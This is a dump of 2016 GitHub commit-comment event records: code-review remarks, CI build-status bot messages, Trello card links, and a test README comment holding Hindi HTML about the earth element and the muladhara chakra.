{"id":"4522388770","type":"CommitCommentEvent","actor":{"login":"vimaldasac"},"repo":{"name":"vimaldasac/test1"},"payload":{"comment":{"id":18914059,"position":1,"line":1,"path":"README.md","commit_id":"848d4017cb3eec8959182c9400f8704c732251df","created_at":"2016-09-06T16:26:19Z","updated_at":"2016-09-06T16:26:19Z","body":"<!DOCTYPE html PUBLIC \"-//W3C//DTD XHTML 1.0 Transitional//EN\" \"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd\">\r\n<html xmlns=\"http://www.w3.org/1999/xhtml\">\r\n<head>\r\n<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" />\r\n<meta http-equiv=\"X-UA-Compatble\" content=\"IE=edge\" />\r\n<title>Purushottam</title>\r\n<link href=\"style.css\" rel=\"stylesheet\" type=\"text/css\" />\r\n</head>\r\n\r\n<body>\r\n<h1>Multimedia Training Video</h1>\r\n<p1>पृथिवी तत्व\r\n• पृथिवी तत्व - शरीर में इस चक्र का निवास मूलाधार चक्र है और यह चक्र शरीर में योनि (गुदा) के पास सीवनी में सुषुम्णा के मुख से संलग्न है । सुषुम्णा यही प्रारम्भ होती है । प्रत्येक चक्र का आकार कमल के फूल सा होता है । यह भूः लोक का प्रतिनिधि है । पृथिवी तत्व का ध्यान इसी चक्र में किया जाता है ।\r\n<br />\r\n<dev class=\"Imp\" id=\"main lines\">पृथिवी तत्व का रंग पीला और आकृति चतुष्कोण होती है । इसका गुण गन्ध है और तदर्थ ज्ञानेन्द्रिय नासिका तथा कर्मेन्द्रिय गुदा है । शरीर में पाण्डु, कमला आदि रोग इसी तत्व के विकार से उत्पन्न होते है । भय आदि मानसिक विकारों में इसी तत्व की प्रधानता होती है । पृथिवी तत्व जन्य विकार मूलाधार चक्र में ध्यान स्थिर करने से स्वयमेव शान्त हो जाते है ।\r\n</dev>\r\n</p1>\r\n\r\n</body>\r\n</html>"}},"created_at":"2016-09-06T16:26:19Z"}
{"id":"4522390668","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":18914063,"position":null,"line":null,"path":null,"commit_id":"40576bd9a7ea91d5e036e3fdc23c18e1bebd24c3","created_at":"2016-09-06T16:26:39Z","updated_at":"2016-09-06T16:26:39Z","body":"os_2_0_no_apppathhelpers (macumber) - x86_64-MacOS-10.10-clang: Build Failed\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-40576bd9a7ea91d5e036e3fdc23c18e1bebd24c3-x86_64-MacOS-10.10-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-failing-red.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-40576bd9a7ea91d5e036e3fdc23c18e1bebd24c3-x86_64-MacOS-10.10-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-06T16:26:39Z"}
{"id":"4522393198","type":"CommitCommentEvent","actor":{"login":"nsbingham"},"repo":{"name":"hrousley/adviewabilitytracker"},"payload":{"comment":{"id":18914065,"position":59,"line":59,"path":"main.js","commit_id":"9e728212285c71aff3993638a710a9b417986db4","created_at":"2016-09-06T16:27:04Z","updated_at":"2016-09-06T16:27:04Z","body":"@hrousley to expand a bit more on debouncing and storing data, the call to `pushToObj(el,viewed);` would push another view into the array each time the browser scrolls or is resized. This is why I think storing the data in a central place (like an array) would be a better approach. Let me know if you had a different thought in mind with this code."}},"created_at":"2016-09-06T16:27:04Z"}
{"id":"4522394715","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18914068,"position":null,"line":null,"path":null,"commit_id":"ea932cdc62bc8b989dacba5ae4ebabd9bbd54fd2","created_at":"2016-09-06T16:27:18Z","updated_at":"2016-09-06T16:27:18Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 934](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12762&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:17"}},"created_at":"2016-09-06T16:27:18Z"}
{"id":"4522395801","type":"CommitCommentEvent","actor":{"login":"itkg-sthibault"},"repo":{"name":"itkg/consumer"},"payload":{"comment":{"id":18914070,"position":5,"line":179,"path":"src/Itkg/Consumer/Client/SoapClient.php","commit_id":"a08c8e5c7578c7fc0e5c154fcbf34096603b83b2","created_at":"2016-09-06T16:27:29Z","updated_at":"2016-09-06T16:27:29Z","body":"si tu ne veux pas qu'il fasse cela il ne faut pas modifier consumer... \r\nc'est juste que quand tu construit ta request setter le \"content\" a vide \r\npar exemple dans https://github.com/itkg/psa-webservice/blob/master/Manager/Config/ConfigManager.php#L56\r\nremplacer  return $this->service->sendRequest(Request::create('Config', Request::METHOD_POST, $requestParams))\r\npar \r\n return $this->service->sendRequest(Request::create('Config', Request::METHOD_POST, $requestParams, array(), array(), array(), ''))\r\n"}},"created_at":"2016-09-06T16:27:29Z"}
{"id":"4522397094","type":"CommitCommentEvent","actor":{"login":"lex148"},"repo":{"name":"zillou/octopus"},"payload":{"comment":{"id":18914075,"position":null,"line":null,"path":null,"commit_id":"b16d5f1bc16adcb53168ae59baa03e3578004204","created_at":"2016-09-06T16:27:42Z","updated_at":"2016-09-06T16:27:42Z","body":"Will you please make a pull request back to thiagopradi/octopus"}},"created_at":"2016-09-06T16:27:42Z"}
{"id":"4522397676","type":"CommitCommentEvent","actor":{"login":"nsbingham"},"repo":{"name":"hrousley/adviewabilitytracker"},"payload":{"comment":{"id":18914077,"position":25,"line":25,"path":"main.js","commit_id":"9e728212285c71aff3993638a710a9b417986db4","created_at":"2016-09-06T16:27:48Z","updated_at":"2016-09-06T16:27:48Z","body":"@hrousley good call on breaking this function out. it might need called in a couple different places."}},"created_at":"2016-09-06T16:27:48Z"}
{"id":"4522397930","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18914078,"position":null,"line":null,"path":null,"commit_id":"111fda15ae8e41b7a757eafabd1ce8c6b84c0efe","created_at":"2016-09-06T16:27:51Z","updated_at":"2016-09-06T16:27:51Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 933](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12764&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:55"}},"created_at":"2016-09-06T16:27:51Z"}
{"id":"4522398096","type":"CommitCommentEvent","actor":{"login":"atsjenkins"},"repo":{"name":"advancedtelematic/rvi_sota_server"},"payload":{"comment":{"id":18914080,"position":null,"line":null,"path":null,"commit_id":"ea932cdc62bc8b989dacba5ae4ebabd9bbd54fd2","created_at":"2016-09-06T16:27:52Z","updated_at":"2016-09-06T16:27:52Z","body":"TeamCity OTA+ :: rvi_sota_server :: ci [Build 935](http://teamcity.prod01.internal.advancedtelematic.com:8111/viewLog.html?buildId=12765&buildTypeId=ota_plus_RviSotaServer_Ci) outcome was **SUCCESS**\nSummary: Tests passed: 237, ignored: 3 Build time: 00:08:51"}},"created_at":"2016-09-06T16:27:52Z"}
{"id":"4522398463","type":"CommitCommentEvent","actor":{"login":"Khaledgarbaya"},"repo":{"name":"contentful/contentful-export"},"payload":{"comment":{"id":18914082,"position":null,"line":null,"path":null,"commit_id":"71916a44c92a9ad5143e680bd9050aa86092621b","created_at":"2016-09-06T16:27:56Z","updated_at":"2016-09-06T16:27:56Z","body":"There was no breaking chang or any code changes that affect the library so\ni don't think it should be a major\n\nOn Tuesday, 6 September 2016, Mario Bodemann <notifications@github.com>\nwrote:\n\n> Just wondering: You are changing a major version of a transient\n> dependency. Does anyone rely on them? If so I would also think about\n> upgrading the major version of the SDK ...\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/contentful/contentful-export/commit/71916a44c92a9ad5143e680bd9050aa86092621b#commitcomment-18914051>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ABGj_d1VvpFo8PUIqyp7B9uXH_EOLfmfks5qnZPygaJpZM4J2Bu3>\n> .\n>\n\n\n-- \n---\nKhaled Garbaya\nJavascript Ecosystem Developer\nwww.contentful.com\n"}},"created_at":"2016-09-06T16:27:56Z"}
{"id":"4522399414","type":"CommitCommentEvent","actor":{"login":"detarmstrong"},"repo":{"name":"detarmstrong/BNO055-Cordova-Example"},"payload":{"comment":{"id":18914083,"position":17,"line":40,"path":"arduino_ble/arduino_ble.ino","commit_id":"06d90c95a39b14fce29a7c337f2a8ab9339ed098","created_at":"2016-09-06T16:28:07Z","updated_at":"2016-09-06T16:28:07Z","body":"I removed this because it appeared to hang forever or crash completely."}},"created_at":"2016-09-06T16:28:07Z"}
{"id":"4522400190","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":18914084,"position":44,"line":54,"path":"docs/content/guide/security.ngdoc","commit_id":"7eddc8891b516ad99152b0826f655e37c4fa728c","created_at":"2016-09-06T16:28:11Z","updated_at":"2016-09-06T16:28:11Z","body":"Totally missed that :+1: "}},"created_at":"2016-09-06T16:28:11Z"}
{"id":"4522400011","type":"CommitCommentEvent","actor":{"login":"marcomauro"},"repo":{"name":"openQCM/openQCM2"},"payload":{"comment":{"id":18914085,"position":24,"line":164,"path":"openqcm-core/src/main/java/org/openqcm/core/ArdulinkConnector.java","commit_id":"38f73c8df92c272f4631037770c0f64ea4b8c0bd","created_at":"2016-09-06T16:28:13Z","updated_at":"2016-09-06T16:28:13Z","body":"error: incompatible types: Link cannot be converted to AbstractListenerLink\r\n"}},"created_at":"2016-09-06T16:28:13Z"}
{"id":"4522403662","type":"CommitCommentEvent","actor":{"login":"nsbingham"},"repo":{"name":"hrousley/adviewabilitytracker"},"payload":{"comment":{"id":18914092,"position":27,"line":27,"path":"main.js","commit_id":"9e728212285c71aff3993638a710a9b417986db4","created_at":"2016-09-06T16:28:49Z","updated_at":"2016-09-06T16:28:49Z","body":"@hrousley even though we're pretty reliant on jQuery, this could be a good call. This function could be moved into a shared library of utilities that are sometimes used with and with jQuery and this bit of code makes that possible."}},"created_at":"2016-09-06T16:28:49Z"}
{"id":"4522406411","type":"CommitCommentEvent","actor":{"login":"shoyer"},"repo":{"name":"jhamman/xarray_paper"},"payload":{"comment":{"id":18914100,"position":38,"line":93,"path":"jors_xarray.tex","commit_id":"2494fc388d04252a0d96d98b54914ffcfbb652fd","created_at":"2016-09-06T16:29:17Z","updated_at":"2016-09-06T16:29:17Z","body":"I don't like this edit. Multi-dimensional arrays are certainly the most common data structure in scientific computing, even beyond Python."}},"created_at":"2016-09-06T16:29:17Z"}
{"id":"4522414072","type":"CommitCommentEvent","actor":{"login":"gkalpak"},"repo":{"name":"angular/angular.js"},"payload":{"comment":{"id":18914115,"position":68,"line":77,"path":"docs/content/guide/security.ngdoc","commit_id":"7eddc8891b516ad99152b0826f655e37c4fa728c","created_at":"2016-09-06T16:30:37Z","updated_at":"2016-09-06T16:30:37Z","body":"You did in https://github.com/angular/angular.js/pull/15094/commits/854da35dfa0f00a228738daadb4655f8c229cf75 :smiley:"}},"created_at":"2016-09-06T16:30:37Z"}
{"id":"4522415358","type":"CommitCommentEvent","actor":{"login":"piecioshka"},"repo":{"name":"PawlakArtur/CurriculumVitae"},"payload":{"comment":{"id":18914118,"position":10,"line":12,"path":"app/index.html","commit_id":"daf2c4e718882d6e61586ebac62ed385ac35fbd5","created_at":"2016-09-06T16:30:50Z","updated_at":"2016-09-06T16:30:50Z","body":"proponuję trzymać się standardu snake-case, czyli, np. `left-side` w tym przypadku"}},"created_at":"2016-09-06T16:30:50Z"}
{"id":"4522418242","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18914123,"position":null,"line":null,"path":null,"commit_id":"ab7a08cde72b3f04d3a1387b27adbedaba6018b0","created_at":"2016-09-06T16:31:20Z","updated_at":"2016-09-06T16:31:20Z","body":"The following doc(s) have been deployed to the [tinefinpat](https://tinefinpat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/migrate-preserve-history](https://tinefinpat-static-docs.pantheonsite.io/docs/migrate-preserve-history)\n"}},"created_at":"2016-09-06T16:31:20Z"}
{"id":"4522418283","type":"CommitCommentEvent","actor":{"login":"xmnlab"},"repo":{"name":"FluVigilanciaBR/fludashboard"},"payload":{"comment":{"id":18914124,"position":5,"line":5,"path":"requirements.txt","commit_id":"a9bc0b4d7875a499f2968da5b0c0489ade89a996","created_at":"2016-09-06T16:31:20Z","updated_at":"2016-09-06T16:31:20Z","body":"@fccoelho, is it correct, folio? or maybe this lib should be folium?"}},"created_at":"2016-09-06T16:31:20Z"}
{"id":"4522419014","type":"CommitCommentEvent","actor":{"login":"nsbingham"},"repo":{"name":"hrousley/adviewabilitytracker"},"payload":{"comment":{"id":18914125,"position":null,"line":null,"path":null,"commit_id":"9e728212285c71aff3993638a710a9b417986db4","created_at":"2016-09-06T16:31:27Z","updated_at":"2016-09-06T16:31:27Z","body":"@hrousley i think I've got all my notes in for now. you've got through the half and onscreen calculations, which are a big part of it. I think working through how you're going to gather and store all the data for the ads as the user scrolls or resizes will be the next big hurdle. Please let me know if you want to talk through any of the feedback."}},"created_at":"2016-09-06T16:31:27Z"}
{"id":"4522421546","type":"CommitCommentEvent","actor":{"login":"namapane"},"repo":{"name":"CJLST/ZZAnalysis"},"payload":{"comment":{"id":18914129,"position":null,"line":null,"path":null,"commit_id":"30f86c42f96e420c50f827019e6884111e953cf6","created_at":"2016-09-06T16:31:51Z","updated_at":"2016-09-06T16:31:51Z","body":"OK thanks. It's maybe safer to checkout a specific commit ID as we do \nfor other packages.=, if they fiddle with existing branches/tags.\n"}},"created_at":"2016-09-06T16:31:51Z"}
{"id":"4522422406","type":"CommitCommentEvent","actor":{"login":"Addvilz"},"repo":{"name":"getsentry/sentry-symfony"},"payload":{"comment":{"id":18914135,"position":4,"line":24,"path":"test/Sentry/SentryBundle/Test/DependencyInjection/ExtensionTest.php","commit_id":"a09d243815c3df77d65bdb70131b7faaabe8899a","created_at":"2016-09-06T16:32:01Z","updated_at":"2016-09-06T16:32:01Z","body":"Sorry! I thought I got rid of all of these!"}},"created_at":"2016-09-06T16:32:01Z"}
{"id":"4522423536","type":"CommitCommentEvent","actor":{"login":"Nous1699"},"repo":{"name":"seedmtk-devs/android_device_google_seedmtk"},"payload":{"comment":{"id":18914140,"position":null,"line":null,"path":null,"commit_id":"f5e1671ec57375ac8b8e0d7fc4035c9778af1955","created_at":"2016-09-06T16:32:14Z","updated_at":"2016-09-06T16:32:14Z","body":"Fix prebuilt kernel hack"}},"created_at":"2016-09-06T16:32:14Z"}
{"id":"4522423884","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":18914143,"position":null,"line":null,"path":null,"commit_id":"ed3d9ce68b87e3039a8574ccb19fb79037e1f1a9","created_at":"2016-09-06T16:32:17Z","updated_at":"2016-09-06T16:32:17Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;CtagJkF7&#x2F;6-ft-005a-hello-world-server\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [FT-005a] Hello world &#x2F; server</a>"}},"created_at":"2016-09-06T16:32:17Z"}
{"id":"4522424166","type":"CommitCommentEvent","actor":{"login":"soonho-tri"},"repo":{"name":"leanprover/lean.js"},"payload":{"comment":{"id":18914144,"position":null,"line":null,"path":null,"commit_id":"df04e1dc4b58c5ea00bff6e7fc58df7ae12f1377","created_at":"2016-09-06T16:32:21Z","updated_at":"2016-09-06T16:32:21Z","body":"@diakopter, sorry for the delays. I realized that I added some patches to my repository and connected it to my repo. I'll add those patches to the main repo and change it to point to the main Lean repo."}},"created_at":"2016-09-06T16:32:21Z"}
{"id":"4522424399","type":"CommitCommentEvent","actor":{"login":"vimaldasac"},"repo":{"name":"vimaldasac/test1"},"payload":{"comment":{"id":18914146,"position":1,"line":1,"path":"README.md","commit_id":"848d4017cb3eec8959182c9400f8704c732251df","created_at":"2016-09-06T16:32:23Z","updated_at":"2016-09-06T16:32:23Z","body":"<html>\r\n</html>"}},"created_at":"2016-09-06T16:32:23Z"}
{"id":"4522427060","type":"CommitCommentEvent","actor":{"login":"mythmon"},"repo":{"name":"Osmose/normandy"},"payload":{"comment":{"id":18914150,"position":17,"line":17,"path":"client/control/components/SimpleRecipeForm.js","commit_id":"4355fcde6aa270749ee2bf48b17f4bf8421d673e","created_at":"2016-09-06T16:32:50Z","updated_at":"2016-09-06T16:32:50Z","body":"In general, I find it a lot more readable to either put helper functions like this after the \"meat\" of the file, or put them in another file. These would be great for a `utils.js`."}},"created_at":"2016-09-06T16:32:50Z"}
{"id":"4522428041","type":"CommitCommentEvent","actor":{"login":"aj07"},"repo":{"name":"gluster/glusterfs"},"payload":{"comment":{"id":18914158,"position":11,"line":7,"path":"README.md","commit_id":"dbc8dac5c357a28aeba17894f8b02faa2af2a792","created_at":"2016-09-06T16:33:00Z","updated_at":"2016-09-06T16:33:00Z","body":"Please correct the \r\n1. Spell of read at \"our Red the Docs site\"\r\n2. Change link to \"http://gluster.readthedocs.io/en/latest/\" instead of using older one."}},"created_at":"2016-09-06T16:33:00Z"}
{"id":"4522442103","type":"CommitCommentEvent","actor":{"login":"duniken"},"repo":{"name":"CIDI/kennethware-2.0"},"payload":{"comment":{"id":18914188,"position":null,"line":null,"path":null,"commit_id":"4c5189a34d7bbb4345e74ec5207655e59f5513bc","created_at":"2016-09-06T16:35:32Z","updated_at":"2016-09-06T16:35:32Z","body":"Hi Elena,\r\nIt is true that my time and effort is being put into extending the functionality of version 3 that is available through Cidi Labs. However, I hope to keep the open source version running as long as possible. Support will end when the effort required to keep it running becomes too great. For example, if Canvas changes something that requires a major code revision.\r\nI do not work with V2 on a regular basis so I am only aware of issues when they are reported to me by those using the open source version.\r\nHopefully that answers your question.\r\nHave a wonderful day,\r\nKenneth"}},"created_at":"2016-09-06T16:35:32Z"}
{"id":"4522444183","type":"CommitCommentEvent","actor":{"login":"dcramer"},"repo":{"name":"getsentry/sentry-symfony"},"payload":{"comment":{"id":18914194,"position":4,"line":24,"path":"test/Sentry/SentryBundle/Test/DependencyInjection/ExtensionTest.php","commit_id":"a09d243815c3df77d65bdb70131b7faaabe8899a","created_at":"2016-09-06T16:35:55Z","updated_at":"2016-09-06T16:35:55Z","body":"no worries -- i managed to also mess it up on first try here ;)"}},"created_at":"2016-09-06T16:35:55Z"}
{"id":"4522444226","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"UniversalMediaServer/UniversalMediaServer"},"payload":{"comment":{"id":18914195,"position":null,"line":null,"path":null,"commit_id":"1581ee2e54d8ef6eb1f47c9958b0d8733778cd4a","created_at":"2016-09-06T16:35:55Z","updated_at":"2016-09-06T16:35:55Z","body":"I'm sorry but could you link to the lines of code you refer to. I don't hardcode things by principle as long as there's another way, so I doubt I've done that. The changes I made was quite the opposite, their aim was to use what we knew about the source media and report that trought the mime \"additions\"."}},"created_at":"2016-09-06T16:35:55Z"}
{"id":"4522444612","type":"CommitCommentEvent","actor":{"login":"adnasa"},"repo":{"name":"vutran/dext"},"payload":{"comment":{"id":18914199,"position":30,"line":71,"path":"app/renderer/src/containers/ResultListContainer.js","commit_id":"2a6c9d2a24ca240671a7de5f4b5c322023f14396","created_at":"2016-09-06T16:36:00Z","updated_at":"2016-09-06T16:36:00Z","body":"I don't think that this is right...?"}},"created_at":"2016-09-06T16:36:00Z"}
{"id":"4522445839","type":"CommitCommentEvent","actor":{"login":"aserratorta"},"repo":{"name":"Flexible-User-Experience/Espai-Kowo"},"payload":{"comment":{"id":18914204,"position":null,"line":null,"path":null,"commit_id":"a8433e1781b7a1def14a9f38bf53fe69f5d81834","created_at":"2016-09-06T16:36:15Z","updated_at":"2016-09-06T16:36:15Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;PraBWyIM&#x2F;36-mail\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> Mail</a>"}},"created_at":"2016-09-06T16:36:15Z"}
{"id":"4522447329","type":"CommitCommentEvent","actor":{"login":"fesor"},"repo":{"name":"fesor/test-apiary"},"payload":{"comment":{"id":18914210,"position":null,"line":null,"path":null,"commit_id":"df208ccccd4bb9313c660a4ff1df0f44e5db1dee","created_at":"2016-09-06T16:36:30Z","updated_at":"2016-09-06T16:36:30Z","body":"__API Description file syntax error on line 1__: expected API name, e.g. '# <API Name>' (Autogenerated message from apiary.io)"}},"created_at":"2016-09-06T16:36:30Z"}
{"id":"4522450047","type":"CommitCommentEvent","actor":{"login":"fesor"},"repo":{"name":"fesor/test-apiary"},"payload":{"comment":{"id":18914220,"position":null,"line":null,"path":null,"commit_id":"1eec6b689bc26b4ed727e7cf7a73506f016fe0f6","created_at":"2016-09-06T16:37:00Z","updated_at":"2016-09-06T16:37:00Z","body":"__API Description file syntax error on line 1__: expected API name, e.g. '# <API Name>' (Autogenerated message from apiary.io)"}},"created_at":"2016-09-06T16:37:00Z"}
{"id":"4522455954","type":"CommitCommentEvent","actor":{"login":"bradleeedmondson"},"repo":{"name":"spdx/license-list-XML"},"payload":{"comment":{"id":18914236,"position":null,"line":null,"path":null,"commit_id":"4aa08098b1ce227d551f8edb712ec2e90a7a9907","created_at":"2016-09-06T16:38:06Z","updated_at":"2016-09-06T16:38:06Z","body":"Nailed it.\r\n\r\n&lt;/sarc&gt;"}},"created_at":"2016-09-06T16:38:06Z"}
{"id":"4522458017","type":"CommitCommentEvent","actor":{"login":"kpearson"},"repo":{"name":"fullstackla/fullstackla.github.io"},"payload":{"comment":{"id":18914239,"position":null,"line":null,"path":null,"commit_id":"bcae083ecba19e6db2592d2d97c0d0fa741e647d","created_at":"2016-09-06T16:38:27Z","updated_at":"2016-09-06T16:38:27Z","body":"Closes #21"}},"created_at":"2016-09-06T16:38:27Z"}
{"id":"4522458138","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18914240,"position":15,"line":15,"path":"examples/av_classifications_example.json","commit_id":"9df4b997490f728c774d8501a998c033482863bd","created_at":"2016-09-06T16:38:28Z","updated_at":"2016-09-06T16:38:28Z","body":"We should update these examples to use the latest versions of the CybOX 3.0 specification. For the File Object, this would be: https://docs.google.com/document/d/1DdS-NrVTjGJ3wvCJ7dbSlhYeiaWS6G6dOXu2F3POpUs/edit#heading=h.99bl2dibcztv"}},"created_at":"2016-09-06T16:38:28Z"}
{"id":"4522464330","type":"CommitCommentEvent","actor":{"login":"cssjoe"},"repo":{"name":"BoldGrid/boldgrid-inspirations"},"payload":{"comment":{"id":18914255,"position":24,"line":582,"path":"includes/class-boldgrid-inspirations-built.php","commit_id":"070bd247be85d732621eeaae56414872b4c202ef","created_at":"2016-09-06T16:39:40Z","updated_at":"2016-09-06T16:39:40Z","body":"WP_PLUGIN_DIR returns a path with no trailing slash (\"/\").  You should add one to complete the path."}},"created_at":"2016-09-06T16:39:40Z"}
{"id":"4522464630","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18914256,"position":17,"line":17,"path":"examples/av_classifications_example.json","commit_id":"9df4b997490f728c774d8501a998c033482863bd","created_at":"2016-09-06T16:39:43Z","updated_at":"2016-09-06T16:39:43Z","body":"Should be a reference (parent_directory_ref) to a Directory Object."}},"created_at":"2016-09-06T16:39:43Z"}
{"id":"4522468060","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18914263,"position":18,"line":18,"path":"examples/av_classifications_example.json","commit_id":"9df4b997490f728c774d8501a998c033482863bd","created_at":"2016-09-06T16:40:25Z","updated_at":"2016-09-06T16:40:25Z","body":"The name of the property should be updated to \"size\"."}},"created_at":"2016-09-06T16:40:25Z"}
{"id":"4522469523","type":"CommitCommentEvent","actor":{"login":"engstk"},"repo":{"name":"engstk/android_device_oneplus_onyx"},"payload":{"comment":{"id":18914269,"position":null,"line":null,"path":null,"commit_id":"0a98f4e77c5f6d8b7c3fca03469237954b162a4d","created_at":"2016-09-06T16:40:41Z","updated_at":"2016-09-06T16:40:41Z","body":"Don't merge"}},"created_at":"2016-09-06T16:40:41Z"}
{"id":"4522470310","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":18914272,"position":null,"line":null,"path":null,"commit_id":"6942113ead978342ab93deb3f71a7f0b386ac70b","created_at":"2016-09-06T16:40:51Z","updated_at":"2016-09-06T16:40:51Z","body":"The following doc(s) have been deployed to the [tinefinpat](https://tinefinpat-static-docs.pantheonsite.io/docs) Multidev environment:\n- [docs/migrate-preserve-history](https://tinefinpat-static-docs.pantheonsite.io/docs/migrate-preserve-history)\n"}},"created_at":"2016-09-06T16:40:51Z"}
{"id":"4522471151","type":"CommitCommentEvent","actor":{"login":"ncoghlan"},"repo":{"name":"ilevkivskyi/peps"},"payload":{"comment":{"id":18914275,"position":27,"line":27,"path":"pep-0555.txt","commit_id":"c69984790bd20fb4e164cb8efd0be36d0fcf65f3","created_at":"2016-09-06T16:41:00Z","updated_at":"2016-09-06T16:41:00Z","body":"Probably worth referencing PEP 483 here as a background primer on type theory as well."}},"created_at":"2016-09-06T16:41:00Z"}
{"id":"4522471171","type":"CommitCommentEvent","actor":{"login":"dgem"},"repo":{"name":"Financial-Times/kmt-myft"},"payload":{"comment":{"id":18914274,"position":6,"line":6,"path":"server/middleware/modifyHostHeader.js","commit_id":"b77aa41f0d1047f5dded0c98381fa5aad5602323","created_at":"2016-09-06T16:41:00Z","updated_at":"2016-09-06T16:41:00Z","body":"Do we really want this level of debug, two messages per request seems excessive"}},"created_at":"2016-09-06T16:41:00Z"}
{"id":"4522471474","type":"CommitCommentEvent","actor":{"login":"sosiouxme"},"repo":{"name":"jcantrill/origin"},"payload":{"comment":{"id":18914276,"position":59,"line":59,"path":"pkg/diagnostics/cluster/aggregated_logging.go","commit_id":"956098049ed08f17edf0616f73bec03814f35993","created_at":"2016-09-06T16:41:05Z","updated_at":"2016-09-06T16:41:05Z","body":"with two cluster diagnostics now using this, i kinda think this should be moved out to the calling routine. we should only need to check it once there, and pass in the masterConfig instead of its location."}},"created_at":"2016-09-06T16:41:05Z"}
{"id":"4522472201","type":"CommitCommentEvent","actor":{"login":"dgem"},"repo":{"name":"Financial-Times/kmt-myft"},"payload":{"comment":{"id":18914278,"position":19,"line":46,"path":"package.json","commit_id":"b77aa41f0d1047f5dded0c98381fa5aad5602323","created_at":"2016-09-06T16:41:14Z","updated_at":"2016-09-06T16:41:14Z","body":"I think we might want to consider either using a version tag or just plain old head of master, rather than a specific commit (imho)"}},"created_at":"2016-09-06T16:41:14Z"}
{"id":"4522473310","type":"CommitCommentEvent","actor":{"login":"Bitti09"},"repo":{"name":"DrRamm/android_device_xiaomi_cancro"},"payload":{"comment":{"id":18914281,"position":null,"line":null,"path":null,"commit_id":"fcb796006fe78d37d009e6d254b62cbf3004ef80","created_at":"2016-09-06T16:41:25Z","updated_at":"2016-09-06T16:41:25Z","body":"does it boots ?"}},"created_at":"2016-09-06T16:41:25Z"}
{"id":"4522473735","type":"CommitCommentEvent","actor":{"login":"ikiril01"},"repo":{"name":"MAECProject/schemas"},"payload":{"comment":{"id":18914283,"position":19,"line":19,"path":"examples/av_classifications_example.json","commit_id":"9df4b997490f728c774d8501a998c033482863bd","created_at":"2016-09-06T16:41:30Z","updated_at":"2016-09-06T16:41:30Z","body":"Should be updated to use the new hashes structure - see example here: https://docs.google.com/document/d/1DdS-NrVTjGJ3wvCJ7dbSlhYeiaWS6G6dOXu2F3POpUs/edit#"}},"created_at":"2016-09-06T16:41:30Z"}
{"id":"4522475108","type":"CommitCommentEvent","actor":{"login":"dawkum"},"repo":{"name":"dawkum/ProgrammingAssignment2"},"payload":{"comment":{"id":18914287,"position":null,"line":null,"path":null,"commit_id":"b27155d0d08b093f011e2e7ae71cf57e576fd359","created_at":"2016-09-06T16:41:46Z","updated_at":"2016-09-06T16:41:46Z","body":"i hope i got it this time!"}},"created_at":"2016-09-06T16:41:46Z"}
{"id":"4522476869","type":"CommitCommentEvent","actor":{"login":"guidoignacio"},"repo":{"name":"David256/ChatBotTelegram"},"payload":{"comment":{"id":18914294,"position":null,"line":null,"path":null,"commit_id":"5591d8c469d999e2c775c4108c55543a7ccb5f87","created_at":"2016-09-06T16:42:07Z","updated_at":"2016-09-06T16:42:07Z","body":"No logro ver lo aprendido mediante print('El bot conoce {0} palabras, pero eso no es todo, también conoce {1}'.format(ia.settings.num_words[1], ia.settings.num_contexts[1]))\r\n\r\ny tengo definido ia = pyborg.pyborg()"}},"created_at":"2016-09-06T16:42:07Z"}
{"id":"4522480268","type":"CommitCommentEvent","actor":{"login":"quesoo"},"repo":{"name":"yu-aosp-n/platform_manifest"},"payload":{"comment":{"id":18914301,"position":null,"line":null,"path":null,"commit_id":"f3409397b0215e67e015165ae5cd8dae03c5bece","created_at":"2016-09-06T16:42:42Z","updated_at":"2016-09-06T16:42:42Z","body":"you go aosp and leave CAF"}},"created_at":"2016-09-06T16:42:42Z"}
